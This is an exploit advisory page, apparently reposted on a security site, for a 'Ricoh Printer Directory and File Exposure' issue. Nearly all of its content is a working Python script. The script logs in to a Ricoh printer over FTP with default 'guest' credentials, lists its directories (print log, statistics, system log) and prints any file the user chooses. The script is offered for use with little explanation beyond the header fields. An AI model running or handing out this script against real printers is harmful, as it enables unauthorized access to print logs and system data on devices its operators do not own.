Ricoh Printer Directory / File Exposure

2024.02.03
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit Title: Ricoh Printer Directory and File Exposure #Date: 9/15/2023 #Exploit Author: Thomas Heverin (Heverin Hacker) #Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers #Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py #Version: Ricoh Printers - All Versions #Tested on: Windows #CVE: N/A #Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log) from ftplib import FTP def ftp_connect(ip): try: ftp = FTP(ip) ftp.login("guest", "guest") print(f"Connected to {ip} over FTP as 'guest'") return ftp except Exception as e: print(f"Failed to connect to {ip} over FTP: {e}") return None if __name__ == "__main__": target_ip = input("Enter the Ricoh Printer IP address: ") ftp_connection = ftp_connect(target_ip) if ftp_connection: try: while True: file_list = ftp_connection.nlst() print("List of Ricoh printer files and directories:") for index, item in enumerate(file_list, start=1): print(f"{index}. {item}") file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1 if file_index < 0: break if 0 <= file_index < len(file_list): selected_file = file_list[file_index] lines = [] ftp_connection.retrlines("RETR " + selected_file, lines.append) print(f"Contents of '{selected_file}':") for line in lines: print(line) else: print("Invalid file index.") except Exception as e: print(f"Failed to perform operation: {e}") finally: ftp_connection.quit()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top